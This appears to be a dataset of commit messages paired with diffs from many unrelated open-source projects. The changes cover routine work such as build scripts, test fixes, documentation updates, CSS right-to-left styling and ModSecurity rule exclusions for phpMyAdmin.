Remove hyphenation when templating new repo
Summary:
Python files do not allow hyphens in variable names.
Here, if the user's new repository base name has a hyphen,
we replace it with an underscore.
Test Plan: `dagster new-repo repo-hyphenated` works
Reviewers: bob | @@ -14,7 +14,7 @@ def generate_new_repo(path: str):
The name of the repository is the base of `path`.
"""
normalized_path = os.path.normpath(path)
- repo_name = os.path.basename(normalized_path)
+ repo_name = os.path.basename(normalized_path).replace("-", "_")
os.mkdir(normalized_path)
|
Issue Make ht.randn check for sane input
So far ht.randn leaves the input checking mostly to pytorch.
This patch modifies ht.randn to at least check some of the
argument properties itself.
Fixes | @@ -786,8 +786,13 @@ def randn(*args, dtype = torch.float32, split = None):
"""
num_of_param = len(args)
- # check if all positional arguments are integers
+ # check if all positional arguments are integers and greater than zero
all_ints = all([isinstance(_, int) for _ in args])
+ if not all_ints:
+ raise TypeError("Only integer-valued dimensions as arguments possible")
+ all_positive = all([_ > 0 for _ in args])
+ if not all_positive:
+ raise ValueError("Not all tensor dimensions are positive")
# define shape of tensor according to args
gshape = (args)
|
Update CREDITS.md
update doi | How to Cite
===========
-The CEA team, "City Energy Analyst v3.30.0", Zenodo, 2021, 10.5281/zenodo.5037913.
+The CEA team, "City Energy Analyst v3.30.0", Zenodo, 2021, 10.5281/zenodo.6494266.
The CEA team
============
|
Comment out console.logs
I'm assuming these were inadvertently committed. | @@ -427,8 +427,8 @@ var analyseChart = {
} else {
yAxisMax = _this.globalOptions.maxRatioItems;
}
- console.log('ratio: ' + _this.globalOptions.chartValues.ratio);
- console.log(_this.globalOptions);
+ // console.log('ratio: ' + _this.globalOptions.chartValues.ratio);
+ // console.log(_this.globalOptions);
barChart.update(_this.globalOptions.barChart,
_this.globalOptions.activeMonth,
_this.globalOptions.chartValues.ratio,
|
Update process_wrapper.py
fixed band name in example | @@ -109,7 +109,7 @@ if __name__ == "__main__":
provider="Eurac Research",
driver_url="https://openeo.eurac.edu",
image_collection="S2_L2A_T32TPS_20M",
- bands="3 11",
+ bands="B03 B11",
band_format="gtiff",
# Rumst bbox w,s,e,n
bbox_string="10.446624755859375, 46.72574176193996, 10.629272460937498, 46.845164430292755",
|
Updated column widths
The Note column is thus far unused anyway. | <th>
{% trans 'Version' %}
</th>
- <th>
+ <th class="col-sm-2">
{% trans 'Functional Version' %}
</th>
<th class="col-sm-2">
{% trans 'CCZ Name' %}
</th>
- <th class="col-sm-2">
+ <th>
{% trans 'Note' %}
</th>
<th>
|
Apple silicon support
* Apple silicon support
* Update build_pip_pkg.sh
indent fix
* Other platforms fix. | @@ -77,14 +77,21 @@ function main() {
BUILD_CMD="setup.py bdist_wheel --platlib-patch"
if is_macos; then
+ if [[ x"$(arch)" == x"arm64" ]]; then
+ BUILD_CMD="${BUILD_CMD} --plat-name macosx_11_0_arm64"
+ else
BUILD_CMD="${BUILD_CMD} --plat-name macosx_10_13_x86_64"
fi
+ PYTHON=python3
+ else
+ PYTHON=python
+ fi
if [[ -z ${NIGHTLY_FLAG} ]]; then
# Windows has issues with locking library files for deletion so do not fail here
- python ${BUILD_CMD} || true
+ $PYTHON ${BUILD_CMD} || true
else
- python ${BUILD_CMD} ${NIGHTLY_FLAG} || true
+ $PYTHON ${BUILD_CMD} ${NIGHTLY_FLAG} || true
fi
cp dist/*.whl "${DEST}"
|
Use condition for zlib sample in Kconfig
Use `if RT_USING_DFS` for zlib sample in Kconfig. | @@ -9,10 +9,11 @@ if PKG_USING_ZLIB
string
default "/packages/misc/zlib"
+if RT_USING_DFS
config ZLIB_USING_SAMPLE
bool "Enable using zlib sample"
default n
- select RT_USING_DFS
+endif
choice
prompt "version"
|
Fix
Put InlineBoxes directly in BlockBox instead of replacing them. | @@ -397,7 +397,6 @@ def compute_content_list(content_list, parent_box, counter_values, css_token,
# in @page context. Obsoletes the parse_again function's deepcopy.
# TODO: Is propbably superfluous in_page_context.
parent_box.cached_counter_values = copy.deepcopy(counter_values)
-
for type_, value in content_list:
if type_ == 'string':
add_text(value)
@@ -1183,15 +1182,6 @@ def flex_children(box, children):
# https://www.w3.org/TR/css-flexbox-1/#flex-items
continue
if isinstance(child, boxes.InlineLevelBox):
- # TODO: Only create block boxes for text runs, not for other
- # inline level boxes. This is false but currently needed
- # because block_level_width and block_level_layout are called
- # in layout.flex.
- if isinstance(child, boxes.ParentBox):
- anonymous = boxes.BlockBox.anonymous_from(
- box, child.children)
- anonymous.style = child.style
- else:
anonymous = boxes.BlockBox.anonymous_from(box, [child])
anonymous.is_flex_item = True
flex_children.append(anonymous)
|
`six`: Fix incorrect `type[type[Any]]` annotation
Mypy will (correctly, I think) start flagging `type[type[Any]]` as an illegal annotation when mypy 0.980 comes out. Let's fix it now, before it comes out. | @@ -28,7 +28,7 @@ PY34: Literal[True]
string_types: tuple[type[str]]
integer_types: tuple[type[int]]
-class_types: tuple[type[type[Any]]]
+class_types: tuple[type[type]]
text_type = str
binary_type = bytes
|
Fix builds for OpenSSL < 1.0.2d
Enabling "make" parallelisation when building OpenSSL < 1.0.2d
causes errors. This commit modifies the OpenSSL 1.x.x recipe to
disable parallel builds for versions less than 1.0.2d. | @@ -552,6 +552,11 @@ class OpenSSLConan(ConanFile):
# /Library/Developer/CommandLineTools/usr/bin/ar: internal ranlib command failed
if self.settings.os == "Macos" and self._full_version < "1.1.0":
parallel = False
+
+ # Building in parallel for versions less than 1.0.2d causes errors
+ # See https://github.com/openssl/openssl/issues/298
+ if self._full_version < "1.0.2d":
+ parallel = False
command.append(("-j%s" % tools.cpu_count()) if parallel else "-j1")
self.run(" ".join(command), win_bash=self._win_bash)
|
Update hermite_multidimensional.hpp
Remove unnecessary vector | @@ -63,10 +63,7 @@ int update_iterator(std::vector<int> &nextPos, std::vector<int> &jumpFrom, int &
jump = 0;
}
for (int ii = 0; ii < dim; ii++) {
- std::vector<int> forwardStep(dim, 0);
- forwardStep[ii] = 1;
-
- if ( forwardStep[ii] + nextPos[ii] > cutoff) {
+ if ( nextPos[ii] + 1 > cutoff) {
nextPos[ii] = 1;
jumpFrom[ii] = 1;
jump = ii+1;
|
Corrected filename installation for anaconda users
The correct filename for setting up via Anaconda is
`install_for_anaconda.sh`
```sh
python3 setup.py install
```
-note: If you have anaconda installed, you can just run `bash install_for_anaconda_users.sh`.
+note: If you have anaconda installed, you can just run `bash install_for_anaconda.sh`.
## For Contributors
If you are interested in contributing to Syft, first check out our [Contributor Quickstart Guide](https://github.com/OpenMined/Docs/blob/master/contributing/quickstart.md) and then sign into our [Slack Team](https://openmined.slack.com/) channel #team_pysyft to let us know which projects sound interesting to you! (or propose your own!).
|
Remove unnecessary tests
These tests are removed because they are too detailed; moreover, only checking for ValueError without the error message does not correctly verify that the exception raised is the correct one. In addition, in the new gate class structure, the input control is moved to each class.
assert qc.gates[6].targets == [5]
assert qc.gates[5].arg_value == 1.570796
- # Test Exceptions # Global phase is not included
- for gate in _single_qubit_gates:
- if gate not in _para_gates:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, None)
- # Multiple targets
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1, 2], None)
- # With control
- pytest.raises(ValueError, qc.add_gate, gate, [0], [1])
- else:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, None, 1)
- # Multiple targets
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1, 2], None, 1)
- # With control
- pytest.raises(ValueError, qc.add_gate, gate, [0], [1], 1)
- for gate in _ctrl_gates:
- if gate not in _para_gates:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, [1])
- # No control
- pytest.raises(ValueError, qc.add_gate, gate, [0], None)
- else:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, [1], 1)
- # No control
- pytest.raises(ValueError, qc.add_gate, gate, [0], None, 1)
- for gate in _swap_like:
- if gate not in _para_gates:
- # Single target
- pytest.raises(ValueError, qc.add_gate, gate, [0], None)
- # With control
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1], [3])
- else:
- # Single target
- pytest.raises(ValueError, qc.add_gate, gate, [0], None, 1)
- # With control
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1], [3], 1)
- for gate in _fredkin_like:
- # Single target
- pytest.raises(ValueError, qc.add_gate, gate, [0], [2])
- # No control
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1], None)
- for gate in _toffoli_like:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, [1, 2])
- # Single control
- pytest.raises(ValueError, qc.add_gate, gate, [0], [1])
-
dummy_gate1 = Gate("DUMMY1")
inds = [1, 3, 4, 6]
qc.add_gate(dummy_gate1, index=inds)
|
fix: Link on onboarding widget for add new record (fix PR#10769)
Fix broken link on onboarding widget for add new record
Fix pull request:
As used on: | @@ -136,7 +136,7 @@ export default class OnboardingWidget extends Widget {
if (step.is_single) {
route = `Form/${step.reference_document}`;
} else {
- route = `Form/${step.reference_document}/__('New')+ ' ' + ${step.reference_document}`;
+ route = __(`Form/${step.reference_document}/{0} {1}`,[__('New'),__(step.reference_document)]);
}
let current_route = frappe.get_route();
@@ -262,7 +262,7 @@ export default class OnboardingWidget extends Widget {
frappe.route_hooks.after_save = callback;
}
- frappe.set_route(`Form/${step.reference_document}/__('New')+ ' ' + ${step.reference_document}`);
+ frappe.set_route(__(`Form/${step.reference_document}/{0} {1}`,[__('New'),__(step.reference_document)]));
}
show_quick_entry(step) {
|
Update test_sw.py
Added metadata to test instrument | @@ -16,6 +16,9 @@ class TestSWKp():
index=[pysat.datetime(2009, 1, 1)
+ pds.DateOffset(hours=3*i)
for i in range(12)])
+ self.testInst.meta = pysat.Meta()
+ self.testInst.meta.__setitem__('Kp': {self.testInst.meta.fill_label:
+ np.nan})
# Load a test Metadata
self.testMeta = pysat.Meta()
|
Update client.py
Changes Chris requested - still needs testing | @@ -202,6 +202,15 @@ class CostarBulletSimulation(object):
(ok, S0, A0, S1, F1, reward) = self.task.world.tick(action)
if self.save:
+ temp_data = []
+ if os.path.isfile('data.npz'):
+ in_data = np.load('data.npz')
+ s0 = in_data['s0'].append(s0)
+ A0 = in_data['A0'].append(A0)
+ S1 = in_data['S1'].append(S1)
+ F1 = in_data['F1'].append(F1)
+ reward = in_data['reward']
+
np.savez('data', s0=s0, A0=A0, S1=S1, F1=F1, reward=reward)
if self.load:
|
Fix clang-tidy 404 in Travis
Summary: Pull Request resolved: | @@ -35,6 +35,6 @@ matrix:
apt:
sources:
- ubuntu-toolchain-r-test
- - llvm-toolchain-trusty-6.0
- packages: clang-tidy-6.0
- script: tools/run-clang-tidy-in-ci.sh -e "$(which clang-tidy-6.0)"
+ - llvm-toolchain-trusty
+ packages: clang-tidy
+ script: tools/run-clang-tidy-in-ci.sh
|
BART: set `-poisson_lambda` default to 3.0
So just using `-mask_length span-poisson` implies lambda=3.0, as in the paper.
choices=["subword", "word", "span-poisson"],
help="Length of masking window to apply.")
group.add("--poisson_lambda", "-poisson_lambda",
- type=float, default=0.0,
+ type=float, default=3.0,
help="Lambda for Poisson distribution to sample span length "
"if `-mask_length` set to span-poisson.")
group.add("--replace_length", "-replace_length",
|
Repair nuke.workio
From | -"""Host API required by Work Files tool"""
+"""Host API required Work Files tool"""
import os
import nuke
@@ -8,37 +8,40 @@ def file_extensions():
def has_unsaved_changes():
- return nuke.Root().modified()
+ return nuke.root().modified()
def save(filepath):
- nuke.scriptSaveAs(filepath)
+ path = filepath.replace("\\", "/")
+ nuke.scriptSaveAs(path)
+ nuke.Root()["name"].setValue(path)
+ nuke.Root()["project_directory"].setValue(os.path.dirname(path))
+ nuke.Root().setModified(False)
def open(filepath):
+ filepath = filepath.replace("\\", "/")
+
+ # To remain in the same window, we have to clear the script and read
+ # in the contents of the workfile.
nuke.scriptClear()
- nuke.scriptOpen(filepath)
+ nuke.scriptReadFile(filepath)
+ nuke.Root()["name"].setValue(filepath)
+ nuke.Root()["project_directory"].setValue(os.path.dirname(filepath))
+ nuke.Root().setModified(False)
return True
def current_file():
current_file = nuke.root().name()
- normalised = os.path.normpath(current_file)
# Unsaved current file
- if nuke.Root().name() == 'Root':
- return "NOT SAVED"
+ if current_file == 'Root':
+ return None
- return normalised
+ return os.path.normpath(current_file).replace("\\", "/")
def work_root():
from avalon import Session
-
- work_dir = Session["AVALON_WORKDIR"]
- scene_dir = Session.get("AVALON_SCENEDIR")
-
- if scene_dir:
- return os.path.join(work_dir, scene_dir)
- else:
- return work_dir
+ return os.path.normpath(Session["AVALON_WORKDIR"]).replace("\\", "/")
|
Update espressif8266_extra.rst
added NonOS SDK-3.0.5 macro definition | @@ -145,7 +145,8 @@ SDK Version
Available versions (macros):
-* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK3`` NonOS SDK-pre-3.0 as of Jun 26, 2018
+* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK305`` NonOS SDK-3.0.5 (available since `Arduino core for ESP8266 3.1.0 <https://github.com/esp8266/Arduino/releases/tag/3.1.0>`_)
+* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK3`` NonOS SDK-pre-3.0 as of Jun 26, 2018 (removed in Arduino core for ESP8266 3.1.0)
* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK221`` NonOS SDK v2.2.1 (legacy) as of Jun 8, 2018
* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK22x_190313`` NonOS SDK v2.2.x branch as of Mar 13, 2019
* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK22x_190703`` NonOS SDK v2.2.x branch as of Jul 03, 2019 **(default)**
|
Remove BigOven API as it is no longer free
Per
BigOven API is only available for free for 2 weeks. | @@ -280,7 +280,6 @@ API | Description | Auth | HTTPS | CORS | Link |
### Food & Drink
API | Description | Auth | HTTPS | CORS | Link |
|---|---|---|---|---|---|
-| BigOven | Recipe Search | `X-Mashape-Key` | No | Unknown | [Go!](http://api2.bigoven.com/) |
| BreweryDB | Beer | `apiKey` | No | Unknown | [Go!](http://www.brewerydb.com/developers) |
| Edamam | Recipe Search | `apiKey` | Yes | Unknown | [Go!](https://developer.edamam.com/) |
| Food2Fork | Recipe Search | `apiKey` | No | Unknown | [Go!](http://food2fork.com/about/api) |
|
fix: fix formatting of "params.yml" for domain classification
fixes | @@ -250,8 +250,9 @@ class DomainClassification(BaseLabeling):
y_true_file.append(y_true)
accuracy = np.mean(np.array(y_true_file) == np.array(y_pred_file))
- return {'metric': 'accuracy', 'minimize': False, 'value': accuracy}
-
+ return {'metric': 'accuracy',
+ 'minimize': False,
+ 'value': float(accuracy)}
def main():
arguments = docopt(__doc__, version='Domain classification')
|
Update Germany Capacity
Use values from 2019 Fraunhofer ISE:
Subtract from Nuclear 1402MW as Philippsburg 2 has been shut off forever (not yet reflected by Fraunhofer ISE).
Hydro, Geothermal, Unknown not changed. | ]
],
"capacity": {
- "biomass": 7740,
- "coal": 44910,
- "gas": 29390,
+ "biomass": 8170,
+ "coal": 43870,
+ "gas": 29850,
"geothermal": 38,
"hydro": 4800,
"hydro storage": 9600,
- "nuclear": 9516,
- "oil": 4300,
- "solar": 47200,
+ "nuclear": 8114,
+ "oil": 4360,
+ "solar": 48570,
"unknown": 3137,
- "wind": 59830
+ "wind": 60710
},
"contributors": [
"https://github.com/corradio"
|
Jam Tests: fix utils patch
stop needs to be called on the patcher, not the mock. Furthermore,
using addCleanup is safer than tearDown because the latter may not be
called if an exception is raised in setUp. | @@ -16,11 +16,12 @@ class JamCreateTeamTests(unittest.IsolatedAsyncioTestCase):
self.guild = MockGuild([self.admin_role])
self.ctx = MockContext(bot=self.bot, author=self.command_user, guild=self.guild)
self.cog = CodeJams(self.bot)
- self.utils_mock = patch("bot.cogs.jams.utils").start()
- self.default_args = [self.cog, self.ctx, "foo"]
- def tearDown(self):
- self.utils_mock.stop()
+ utils_patcher = patch("bot.cogs.jams.utils")
+ self.utils_mock = utils_patcher.start()
+ self.addCleanup(utils_patcher.stop)
+
+ self.default_args = [self.cog, self.ctx, "foo"]
async def test_too_small_amount_of_team_members_passed(self):
"""Should `ctx.send` and exit early when too small amount of members."""
|
Utilize New DROP IF EXISTS Redshift Feature
Redshift added the ability to drop a table with an IF EXISTS, so using
that here to reduce errors. | @@ -286,7 +286,7 @@ class TableResource(SchemaResource):
timeformat 'auto'
delimiter '^' removequotes escape compupdate off """
- drop_table_stmt = """DROP TABLE {schema_name}.{table_name}"""
+ drop_table_stmt = """DROP TABLE IF EXISTS {schema_name}.{table_name}"""
def __init__(self, rs_cluster, schema, table):
SchemaResource.__init__(self, rs_cluster, schema)
|
Fix the tear down function in integration.modules.test_grains.GrainsAppendTestCase
Fix the tear down function to just set the grain to an empty list instead of
removing each individual item | @@ -152,8 +152,7 @@ class GrainsAppendTestCase(ModuleCase):
GRAIN_VAL = 'my-grain-val'
def tearDown(self):
- for item in self.run_function('grains.get', [self.GRAIN_KEY]):
- self.run_function('grains.remove', [self.GRAIN_KEY, item])
+ self.run_function('grains.setval', [self.GRAIN_KEY, []])
def test_grains_append(self):
'''
|
phpMyAdmin: exclude tbl_select.php
Search rows in a table.
MySQL chars such as '%' trigger rules on ARGS:criteriaColumnTypes[n]
so the only way to prevent them is to exclude whole ARGS, trying
to keep the number of excluded rules minimal. | @@ -285,5 +285,19 @@ SecAction \
ctl:ruleRemoveTargetById=942200;REQUEST_COOKIES:pma_console_config,\
ctl:ruleRemoveTargetById=942260;REQUEST_COOKIES:pma_console_config"
+# Search rows in a table
+# MySQL chars such as '%' trigger rules on ARGS:criteriaColumnTypes[n]
+SecRule REQUEST_FILENAME "@endsWith /tbl_select.php" \
+ "id:9008270,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ chain"
+ SecRule &REQUEST_COOKIES_NAMES:'/^(?:phpMyAdmin|phpMyAdmin_https)$/' "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=942440;ARGS:orderByColumn,\
+ ctl:ruleRemoveTargetById=942470;ARGS,\
+ ctl:ruleRemoveTargetById=942300;ARGS"
SecMarker "END-PHPMYADMIN"
|
Fix webnovelonlinenet chapter list
Chapter list is now in the novel info page instead of in a different request | @@ -53,24 +53,13 @@ class WebNovelOnlineNet(Crawler):
self.novel_author = author[0].text
logger.info("Novel author: %s", self.novel_author)
- self.novel_id = soup.select_one("#manga-chapters-holder")["data-id"]
- logger.info("Novel id: %s", self.novel_id)
-
- response = self.submit_form(
- chapter_list_url, data="action=manga_get_chapters&manga=" + self.novel_id
- )
- soup = self.make_soup(response)
- for a in reversed(soup.select(".wp-manga-chapter a")):
- chap_id = len(self.chapters) + 1
- vol_id = 1 + len(self.chapters) // 100
- if chap_id % 100 == 1:
- self.volumes.append({"id": vol_id})
+ for li in reversed(soup.select(".listing-chapters_wrap ul li")):
+ a = li.select_one("a")
self.chapters.append(
{
- "id": chap_id,
- "volume": vol_id,
- "title": a.text.strip(),
+ "id": len(self.chapters) + 1,
"url": self.absolute_url(a["href"]),
+ "title": a.text.strip(),
}
)
|
Added a filter to exclude Ubuntu 12.04
The feature-enabling patch was not checked into this version of the kernel source code. kernel.ubuntu.com/ubuntu/ubuntu-precise.git
exit 0
fi
+if [[ $DISTRO == "ubuntu 12.04"* ]]; then
+ LogErr "This distro $DISTRO does not support $ETHTOOL_KEYS features"
+ SetTestStateSkipped
+ exit 0
+fi
+
GetSynthNetInterfaces
if ! GetSynthNetInterfaces; then
msg="ERROR: No synthetic network interfaces found"
|
NONE fix verify_response default arguments
* fix default none arguments
* refactor func
* Update abstract_clients.py
fix comments | @@ -77,7 +77,7 @@ class RestClient(Client):
return response
def __verify_response(self, response: Response, error_msg: str, expected_status_codes: list = None):
- if response.ok or response.status_code in expected_status_codes:
+ if response.ok or (expected_status_codes and response.status_code in expected_status_codes):
return
status_code = response.status_code
|
Garbage collect on no_thread_leaks fixture
That should avoid counting a pseudo-dangling thread that had already
been stopped, but hadn't been garbage collected yet because of some
circular reference (or something else) | from functools import partial
+import gc
import os
import threading
import pytest
@@ -28,6 +29,7 @@ def no_thread_leaks():
We do not use pytest-threadleak because it is not reliable.
"""
yield
+ gc.collect() # Clear the stuff from other function-level fixtures
assert threading.active_count() == 1 # Only the main thread
|
Update docs to reflect new maximum timeout value
Based on this change: | @@ -159,7 +159,7 @@ To create a "cron" check, specify the "schedule" and "tz" parameters.
<td>
<p>number, optional, default value: {{ default_timeout }}.</p>
<p>A number of seconds, the expected period of this check.</p>
- <p>Minimum: 60 (one minute), maximum: 604800 (one week).</p>
+ <p>Minimum: 60 (one minute), maximum: 2592000 (30 days).</p>
<p>Example for 5 minute timeout:</p>
<pre>{"kind": "simple", "timeout": 300}</pre>
</td>
@@ -292,7 +292,7 @@ To create a "cron" check, specify the "schedule" and "tz" parameters.
<td>
<p>number, optional.</p>
<p>A number of seconds, the expected period of this check.</p>
- <p>Minimum: 60 (one minute), maximum: 604800 (one week).</p>
+ <p>Minimum: 60 (one minute), maximum: 2592000 (30 days).</p>
<p>Example for 5 minute timeout:</p>
<pre>{"kind": "simple", "timeout": 300}</pre>
</td>
|
Remove unused type check 'int' in audit.py
Although this method does not report an error, this type check 'int'
is redundant and may be misleading.
Reference code url:
return audits_collection
@wsme_pecan.wsexpose(AuditCollection, types.uuid, int, wtypes.text,
- wtypes.text, wtypes.text, wtypes.text, int)
+ wtypes.text, wtypes.text, wtypes.text)
def get_all(self, marker=None, limit=None, sort_key='id', sort_dir='asc',
goal=None, strategy=None):
"""Retrieve a list of audits.
|
README: manual newline formatting
Ugh. rst is terrible :) | @@ -63,10 +63,10 @@ and `guidelines`_ for contributing in the documentation.
Maintainers
===========
-`@tych0`_ GPG: ``3CCA B226 289D E016 0C61 BDB4 18D1 8F1B C464 DCA3``
-`@ramnes`_ GPG: ``99CC A84E 2C8C 74F3 2E12 AD53 8C17 0207 0803 487A``
-`@m-col`_ GPG: ``35D9 2E7C C735 7A81 173E A1C9 74F9 FDD2 0984 FBEC``
-`@flacjacket`_ GPG: ``58B5 F350 8339 BFE5 CA93 AC9F 439D 9701 E7EA C588``
+| `@tych0`_ GPG: ``3CCA B226 289D E016 0C61 BDB4 18D1 8F1B C464 DCA3``
+| `@ramnes`_ GPG: ``99CC A84E 2C8C 74F3 2E12 AD53 8C17 0207 0803 487A``
+| `@m-col`_ GPG: ``35D9 2E7C C735 7A81 173E A1C9 74F9 FDD2 0984 FBEC``
+| `@flacjacket`_ GPG: ``58B5 F350 8339 BFE5 CA93 AC9F 439D 9701 E7EA C588``
.. _`@tych0`: https://github.com/tych0
.. _`@ramnes`: https://github.com/ramnes
|
Fix styles on RTL languages.
Fixes | .DevHub-MyAddons-item-modified {
margin-left: auto;
align-self: flex-end;
+
+ html[dir=rtl] & {
+ margin-right: auto;
+ margin-left: 0;
+ }
}
.DevHub-MyAddons-item-details {
margin-left: 25px;
a {
- margin-left: 5px;
font-size: 15px;
text-decoration: none;
color: @color-button-default;
+ margin: 0 5px;
&.DevHub-MyAddons-version-status-incomplete,
&.DevHub-MyAddons-version-status-deleted,
font-size: 13px;
font-weight: 500;
color: #fff;
+ margin: 0 5px;
}
.DevHub-MyAddons-item-channel-listed {
}
.DevHub-MyAddons-item-version-details {
+ display: flex;
width: 320px;
}
+.DevHub-MyAddons-item-version {
+ margin: 0 5px;
+}
+
.DevHub-MyAddons-item-buttons {
margin-top: 20px;
display: flex;
.DevHub-MyAddons-item-buttons-submit {
margin-left: auto;
+
+ html[dir=rtl] & {
+ margin-right: auto;
+ margin-left: 0;
+ }
}
.DevHub-MyAddons-whatsnew-container {
background-repeat: no-repeat;
background-position: right 10px bottom 10px;
+ html[dir=rtl] & {
+ background-position: left 35px bottom 10px;
+ }
+
&::before {
content: '';
background-image: url("../../../img/developers/new-landing/whatsnew-rocket.png");
top: 28px;
pointer-events: none;
+ html[dir=rtl] & {
+ transform: scaleX(-1);
+ left: auto;
+ right: -8px;
+ }
+
@media @retina {
background-image: url("../../../img/developers/new-landing/whatsnew-rocket-2x.png");
}
div:first-child {
text-align: right;
+
+ html[dir=rtl] & {
+ text-align: left;
+ }
}
p,
|
fix(views): fix cleanup of non-interactive view runtimes
Previously non-interactive view runtimes never got removed from
ViewRuntimeController._view_runtimes properly. This becomes a problem when
combining non-interactive views and limiting concurrent users
(https://lona-web.org/cookbook/limit-concurrent-views.html) | @@ -272,7 +272,14 @@ class ViewRuntimeController:
)
else:
- return view_runtime.start()
+ response_dict = view_runtime.start()
+
+ # Non interactive runtimes don't have to be held in memory, after
+ # handle_request() finished, because they can't be daemonized or
+ # receive input events.
+ self.remove_view_runtime(view_runtime)
+
+ return response_dict
views_logger.debug('message handled')
|
Shift non-interactive flag handling earlier in chain
Generate the appropriate behavior (prompt vs. raise exception) in get_username and get_password via a helper method rather than passing the non-interactive flag down through all the helper functions. This allows the later helper functions to be reverted back to their original, simpler forms. | @@ -238,38 +238,45 @@ def get_password_from_keyring(system, username):
warnings.warn(str(exc))
-def non_interactive_check_prompt(non_interactive, prompt_func, prompt_type):
- if non_interactive:
- error_message = "Credential not found for {}.".format(prompt_type)
- raise exceptions.NonInteractive(error_message)
- else:
- message = "Enter your {}: ".format(prompt_type)
- return prompt_func(message)
-
-
-def username_from_keyring_or_prompt(system, non_interactive):
+def username_from_keyring_or_prompt(system, prompt_func):
return (
get_username_from_keyring(system)
- or non_interactive_check_prompt(
- non_interactive,
- input_func,
- 'username',
- )
+ or prompt_func()
)
-def password_from_keyring_or_prompt(system, username, non_interactive):
+def password_from_keyring_or_prompt(system, username, prompt_func):
return (
get_password_from_keyring(system, username)
- or non_interactive_check_prompt(
- non_interactive,
- password_prompt,
- 'password',
+ or prompt_func()
+ )
+
+
+def raises_noninteractive_exc(message):
+ raise exceptions.NonInteractive(message)
+
+
+def generate_prompt_func_from(prompt_func, prompt_type, non_interactive):
+ if non_interactive:
+ error_message = "Credential not found for {}.".format(prompt_type)
+ return functools.partial(
+ raises_noninteractive_exc,
+ error_message,
)
+ else:
+ message = "Enter your {}: ".format(prompt_type)
+ return functools.partial(
+ prompt_func,
+ message,
)
def get_username(system, cli_value, config, non_interactive):
+ prompt_func = generate_prompt_func_from(
+ input_func,
+ 'username',
+ non_interactive,
+ )
return get_userpass_value(
cli_value,
config,
@@ -277,7 +284,7 @@ def get_username(system, cli_value, config, non_interactive):
prompt_strategy=functools.partial(
username_from_keyring_or_prompt,
system,
- non_interactive,
+ prompt_func,
)
)
@@ -311,6 +318,11 @@ class EnvironmentDefault(argparse.Action):
def get_password(system, username, cli_value, config, non_interactive):
+ prompt_func = generate_prompt_func_from(
+ password_prompt,
+ 'password',
+ non_interactive,
+ )
return get_userpass_value(
cli_value,
config,
@@ -319,7 +331,7 @@ def get_password(system, username, cli_value, config, non_interactive):
password_from_keyring_or_prompt,
system,
username,
- non_interactive,
+ prompt_func,
),
)
|
Updates warning text when unpickling figures fails.
Text is now less confusing, stating explicitly what the error
was, and whether a successful workaround was performed. | @@ -71,14 +71,14 @@ class ReportFigure(object):
try:
self._save_axes(filename)
except Exception as e:
- print('Initial unpickling of figure failed, trying to use cached formats')
+ print('Warning: unpickling to save figure %s failed:\n %s' % (filename, str(e)))
ext = os.path.splitext(filename)[1][1:] # remove .
- print(ext)
if ext in self.tempFileDict:
tf = _tempfile.NamedTemporaryFile()
tf.write(self.tempFileDict[ext])
_shutil.copy2(tf.name, filename)
tf.close()
+ print(" --> Successfully used cached %s format" % ext)
else:
print('Extension not in cached files and unpickling failed. Trying experimental backend switching. Your machine may catch fire..')
# Subprocess didn't work without auxillary file (cannot import parent module '') -> we weren't desperate enough to do the auxillary file, so no promises that works either
|
Add more clear error message for Doubly Robusts CPE
Summary:
`ValueError: a must be non-empty` happens if no valid doubly-robust data is generated. Possibly because the user specifies wrong metric names. So we try to assert early on this issue.
See: | @@ -85,6 +85,14 @@ class SequentialDoublyRobustEstimator:
last_episode_end = episode_end
i += 1
+ assert len(doubly_robusts) > 0, (
+ f"No valid doubly robusts data is generated. "
+ f"Logged_rewards={logged_rewards}, importance_weight={importance_weight},"
+ f" estimated_q_values_for_logged_action={estimated_q_values_for_logged_action}"
+ f" estimated_state_values={estimated_state_values}, gamma={self.gamma}"
+ f" Did you specify wrong metric names?"
+ )
+
doubly_robusts = np.array(doubly_robusts) # type: ignore
dr_score = float(np.mean(doubly_robusts))
dr_score_std_error = bootstrapped_std_error_of_mean(doubly_robusts)
|
Remove double-running dagster-gcp tests
Test Plan: na
Reviewers: alangenfeld | @@ -321,7 +321,6 @@ def deploy_trigger_step():
steps += library_tests()
- steps += gcp_tests()
steps += examples_tests()
steps += [wait_step(), coverage_step(), wait_step(), deploy_trigger_step()]
|
Start slower test runs first.
In case there aren't enough self hosted runners | @@ -79,6 +79,46 @@ jobs:
with:
changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+ windows-2016:
+ name: Windows 2016
+ needs:
+ - get-changed-files
+ uses: ./.github/workflows/test-action.yml
+ with:
+ distro-slug: windows-2016
+ nox-session: ci-test
+ changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+
+ windows-2019:
+ name: Windows 2019
+ needs:
+ - get-changed-files
+ uses: ./.github/workflows/test-action.yml
+ with:
+ distro-slug: windows-2019
+ nox-session: ci-test
+ changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+
+ windows-2022:
+ name: Windows 2022
+ needs:
+ - get-changed-files
+ uses: ./.github/workflows/test-action.yml
+ with:
+ distro-slug: windows-2022
+ nox-session: ci-test
+ changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+
+ macos-12:
+ name: MacOS 12
+ needs:
+ - get-changed-files
+ uses: ./.github/workflows/test-action-macos.yml
+ with:
+ distro-slug: macos-12
+ nox-session: ci-test
